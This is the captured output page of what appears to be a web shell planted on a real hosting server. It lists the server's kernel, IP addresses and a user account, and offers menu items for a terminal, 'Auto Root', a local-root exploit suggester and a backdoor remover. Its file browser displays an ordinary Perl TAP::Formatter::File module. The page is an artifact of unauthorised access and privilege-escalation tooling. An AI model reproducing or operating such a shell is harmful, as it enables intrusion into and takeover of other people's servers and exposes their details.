Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
perl5 /
vendor_perl /
TAP /
Formatter /
Delete
Unzip
Name
Size
Permission
Date
Action
Console
[ DIR ]
drwxr-xr-x
2021-09-16 10:43
File
[ DIR ]
drwxr-xr-x
2021-09-16 10:43
Base.pm
11.63
KB
-rw-r--r--
2013-05-02 15:14
Color.pm
3.21
KB
-rw-r--r--
2013-05-02 15:14
Console.pm
1.75
KB
-rw-r--r--
2013-05-02 15:14
File.pm
890
B
-rw-r--r--
2013-05-02 15:14
Session.pm
3.74
KB
-rw-r--r--
2013-05-02 15:14
Save
Rename
package TAP::Formatter::File; use strict; use TAP::Formatter::Base (); use TAP::Formatter::File::Session; use POSIX qw(strftime); use vars qw($VERSION @ISA); @ISA = qw(TAP::Formatter::Base); =head1 NAME TAP::Formatter::File - Harness output delegate for file output =head1 VERSION Version 3.28 =cut $VERSION = '3.28'; =head1 DESCRIPTION This provides file orientated output formatting for TAP::Harness. =head1 SYNOPSIS use TAP::Formatter::File; my $harness = TAP::Formatter::File->new( \%args ); =head2 C<< open_test >> See L<TAP::Formatter::base> =cut sub open_test { my ( $self, $test, $parser ) = @_; my $session = TAP::Formatter::File::Session->new( { name => $test, formatter => $self, parser => $parser, } ); $session->header; return $session; } sub _should_show_count { return 0; } 1;